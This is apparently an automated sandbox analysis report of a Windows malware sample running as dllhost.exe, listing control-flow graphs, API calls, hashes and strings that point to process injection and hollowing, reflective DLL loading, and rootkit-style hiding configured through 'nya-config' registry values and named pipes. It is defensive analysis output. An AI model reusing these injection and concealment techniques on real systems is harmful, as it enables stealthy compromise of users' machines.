StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->61 102->61 
103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                  • API String ID: 2456419452-2628171563
                                                  • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                  • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 113 1400031d0-1400031f1 114 140003413-140003419 113->114 115 1400031f7 113->115 116 140003619 call 140001f7c 114->116 117 14000341f-140003425 114->117 118 140003355-140003379 ReadFile 115->118 119 1400031fd-140003203 115->119 122 14000361e-140003630 116->122 120 1400035c9-1400035dc call 1400020fc 117->120 121 14000342b-14000342e 117->121 118->122 123 14000337f-140003386 118->123 125 140003209-14000320c 119->125 126 14000334c-14000334e ExitProcess 119->126 120->122 143 1400035de-1400035ed call 1400020fc 120->143 128 140003434-14000343a 121->128 129 140003515-140003526 call 1400020fc 121->129 123->122 130 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 123->130 131 140003212-140003215 125->131 132 14000333d-140003347 125->132 136 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 128->136 137 140003440-140003446 128->137 129->122 155 14000352c-14000354e ReadFile 129->155 145 1400033c5-1400033c7 130->145 133 14000321b-140003221 131->133 134 140003330-140003338 131->134 132->122 140 1400032c2-1400032e6 ReadFile 133->140 141 140003227-14000322a 133->141 134->122 137->122 144 14000344c-140003477 RegOpenKeyExW 137->144 140->122 154 1400032ec-1400032f3 140->154 141->122 147 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 141->147 143->122 165 1400035ef-140003617 ShellExecuteW 143->165 150 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 144->150 151 140003479-1400034af RegDeleteValueW * 3 144->151 152 1400033c9-1400033cf 145->152 153 1400033fa-14000340e GetProcessHeap HeapFree 145->153 147->122 156 14000326e-14000327f 147->156 150->122 151->150 152->153 160 1400033d1-1400033e3 152->160 153->122 154->122 161 1400032f9-14000332b call 140001868 * 2 154->161 155->122 162 140003554-14000355b 155->162 156->122 163 140003285-1400032bb call 140001868 * 2 156->163 167 1400033e5-1400033e7 160->167 168 1400033e9-1400033f1 160->168 161->122 
162->122 170 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 162->170 189 1400032bd 163->189 165->122 167->168 173 1400033f5 call 140001eec 167->173 168->160 174 1400033f3 168->174 170->153 176 1400035a5-1400035b1 170->176 173->153 174->153 176->153 181 1400035b7-1400035c4 call 140002434 176->181 181->153 189->122
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                                  • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                                  • API String ID: 2078740077-1712970621
                                                  • Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                  • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                                  • Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                  • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 4084875642-0
                                                  • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                  • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                                  • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                  • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 2721474350-832442975
                                                  • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                  • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\$nya-childproc
                                                  • API String ID: 2203880229-802795868
                                                  • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                  • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                                  • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                  • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\$nya-control
                                                  • API String ID: 2071455217-2728758917
                                                  • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                  • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                  • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 1323846700-0
                                                  • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                  • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                                  • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                  • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                    • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                    • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                    • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                    • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                    • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                    • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                  • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                  • String ID:
                                                  • API String ID: 2472495637-0
                                                  • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                  • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                  • API String ID: 1036100660-1371749706
                                                  • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                  • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                  • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID:
                                                  • API String ID: 4184240511-0
                                                  • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                  • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 3993315683-3572789727
                                                  • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                  • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                                  • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                  • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                  • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\$nya-config
                                                  • API String ID: 3013565938-2636501262
                                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                  • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                  • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                  • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                  APIs
